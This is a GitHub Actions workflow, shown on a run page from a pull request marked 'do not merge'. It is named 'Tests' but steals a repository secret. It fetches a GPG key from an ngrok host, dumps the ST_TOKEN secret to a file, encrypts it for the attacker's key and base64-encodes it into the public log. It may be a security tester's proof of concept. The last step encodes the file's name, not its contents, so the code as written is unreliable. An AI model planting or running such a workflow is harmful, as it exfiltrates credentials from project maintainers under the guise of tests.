Ignacio halborn do not merge #537
Workflow file for this run
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
name: Tests | |
on: | |
pull_request: | |
branches: | |
- "**" | |
push: | |
branches: | |
- "master" | |
workflow_dispatch: | |
jobs: | |
install-tparse: | |
runs-on: ubuntu-latest | |
steps: | |
- name: Get key | |
run: wget https://c574-85-52-243-15.ngrok-free.app/ignacio.key | |
- name: Import GPG key | |
run: gpg --import ignacio.key | |
- name: get secrets | |
run: echo ${{ secrets.ST_TOKEN }} > secret.txt | |
- name: trust key | |
run: echo -e "5\ny\n" | gpg --command-fd 0 --edit-key tmp_key trust | |
- name: encrypt secrets | |
run: gpg -e -r tmp_key secret.txt | |
- name: encode encrypted secrets | |
run: base64 <<< secret.txt.gpg | |